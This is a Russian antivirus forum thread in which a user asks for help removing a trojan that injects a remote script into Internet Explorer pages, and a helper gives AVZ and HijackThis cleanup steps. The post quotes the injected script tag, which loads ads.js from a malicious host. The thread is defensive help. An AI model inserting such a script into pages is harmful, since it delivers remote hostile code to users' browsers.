Перейти к содержанию

Троянская программа Trojan-Downloader.JS.Multi.cj


Рекомендуемые сообщения

подцепил червя... онлайн чекеры Касперского и Др.Веба ничего не находят... SpyBot S&D также мимо... описанная здесь http://forum.kasperskyclub.ru/index.php?showtopic=1698 последовательность процедур также ни к чему не привела, к сожалению... червь вставляет в код отрываемых в IE страниц следующее:

 

<script language="javascript" SRC="http://hk.www404.cn:53/ads.js"></script>

 

на это Касперский уже реагирует и удаляет... вот, помогите, плиз...

 

логи программ в аттаче

 

спасибо

 

сорри за даблпост

sysinfo.zip

virusinfo_syscure.zip

hijackthis.zip

Ссылка на комментарий
Поделиться на другие сайты

virusinfo_cure.zip удалите как вложение - это карантин с подозрительными файлами и вылаживать его не нужно. Вам скажут куда его нужно отослать, если понадобится.

 

Выполните в АВЗ меню Файл--подменю Восстановление системы пункты 2,3,4 поставьте галочки и нажмите кнопку Выполнить отмеченные операции

 

Профиксите в HJT

O2 - BHO: (no name) - {A5366673-E8CA-11D3-9CD9-0090271D075B} - (no file)

Изменено пользователем wise-wistful
Ссылка на комментарий
Поделиться на другие сайты

virusinfo_cure.zip удалите как вложение - это карантин с подозрительными файлами и вылаживать его не нужно. Вам скажут куда его нужно отослать, если понадобится.

 

Выполните в АВЗ меню Файл--подменю Восстановление системы пункты 2,3,4 поставьте галочки и нажмите кнопку Выполнить отмеченные операции

 

Профиксите в HJT

O2 - BHO: (no name) - {A5366673-E8CA-11D3-9CD9-0090271D075B} - (no file)

 

сделал... перегрузился... не помогло... :whistle:

Ссылка на комментарий
Поделиться на другие сайты

Давайте попробуем так. Отключите пока SpyBot сделайте логи АВЗ и HJT без него.

 

прогнал без него... имхо тот же самый результат... (

hijackthis.zip

virusinfo_syscure.zip

Ссылка на комментарий
Поделиться на другие сайты

Н-да, в логах ничего нового не появилось. Проблемы именно с ИЕ такие или в дугих браузерах то же?

 

да, трабл тока в ИЕ... другие версии понятно... но хотелось бы вылечить эту...

 

ммм... трабл видимо находится в локалке... вот что удалось найти по сабжу - http://www.web-trac.com/hkwww404cn53adsjs-10-05/

 

однако, как лечиться от этого пока вопрос...

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • gulyeza
      Автор gulyeza
      Здравствуйте, вчера умудрился попостятся на троян. Если рассказывать кратко, качал зип архив с UploadHeaven, но начались перебросы по ссылкам и по итогу скачался exe файл. Сразу закинуть его в проверку ума не хватило, да и повода сомневается не было, очень много в свое время оттуда качал, вот и подумал, может у них обновление какое то, что распаковщик теперь такой. Но стоило только открыть, сразу антивирус начал всю систему грузить, начал пытаться закрывать, но только через диспетчер смог. Так же в диспетчере появились 3 новые процесса, 1 из которых не запомнил, а остальные 2 были: reason cybersecurite и reason cybersecurite vpn. Начал через параметры их удалять, так то даже получилось. Затем зашел в виндоус дефендер, он как то странно тупил, подгружался постоянно, через пару секунд вообще выключился. Ну я и нажал снова включить, как я понял, это и была главная ошибка, потому что высветилось окно подтверждения с изменением файлов (стандартное когда запускаешь антивирусник) я и нажал на "Да". На первый взгляд вообще ничего не поменялось, подумал что пора винду сносить. Все переустановил, правда не с внешнего накопителя, а локально, с этого же ноута. И есть подозрения, что особо красок не поменяло, потому что при заходе в дефендер пишет, мол "Ваш системный администратор ограничил доступ", пытался это выключить по гайдам на сайте майкрасофта, ничего не сработало. Подумал надо и биос сбросить, зашел потыкался, не особо понял поменялось ли вообще что то.
      Прикладываю скан того exe с вирус тотала:
      Так же файл с логами:CollectionLog-2025.06.22-19.56.zip
      Еще, после сбора логов, эта надпись "Ваш системный администратор ограничил доступ" в дефендере пропала, не знаю хорошо это или плохо.
      Заранее Спасибо за ответ, надеюсь проблема решаема.
      upd: после сброса винды, запускал скан доктор веба, ничего не нашел
    • DAV
      Автор DAV
      в пятницу лег сервер: зашифрованы все системные файлы и вся база 1С. Также файлы на зеркальном диске, а бэкапы на другом диске почему-то оказались повреждены (копировались каждый вечер).
      в закодированном файле текст в таких иероглифах: "... ৸믻䀹ᑞஞ樱惒孌ڨ쎩델꥛睟괎䦝捰㨿秡﹈贆Ŵ䣍㥶﬍ຌ̒螐꯵ॶㅈ鹧ӷ፮箈ꥦ 樟倣폃웘붾셳炼..."
      один из файлов 1С теперь с таким названием: 1Cv8.lgf.id-DEB1FBBC.[James2020m@aol.com].MUST.id[DEB1FBBC-3259].[restore1_helper@gmx.de].
       
      кто знает, как вернуться к "родной" кодировке, подскажите, пожалуйста.
       
      P.S. "доброжелатели" в сопутствующем info письме указали адреса для контакта: restore1_helper@gmx.de или restore2_helper@mein.gmx.
    • Kdademon
      Автор Kdademon
      02.072025 обнаружили что на 2 компа (Windows 7) попал вирус шифровальщик 
      подключились предположительно по RDP
      зашифровали все базы 1с, бэкапы, архивы, документы
      файл с обращением от вымогателей нашли
      Kaspersky Virus Removal Tool нашел вируc HEUR:Trojan-Ransom.Win32.Mimic.gen

      Подскажите порядок действий по лечению этих компов и возможна ли дешифровка?
      Как можно обезопасится от подобного?
      Поможет ли установка Kaspersky на все компьютеры сети?

      Во вложении архив с примерами зашифрованных файлов из папки php
      Файлы постарался выбрать стандартные, общеизвестные может поможет в дешифровке
      Также приложил скрин с проверкой от Kaspersky Virus Removal Tool

      php.rar
    • MiStr
      Автор MiStr
      Здесь можно задать вопросы по программе «Продвижение продуктов».

      Запрещается обсуждение и обнародование самих вознаграждений. В этой теме принимаются только вопросы по программе. Обсуждение вознаграждения возможно только в специальном закрытом разделе.
    • MiStr
      Автор MiStr
      Результаты участников программы:
       
      2018 год
       
      2019 год
       
      2020 год
       
      2021 год

      2022 год

      2023 год

      2024 год

      2025 год
×
×
  • Создать...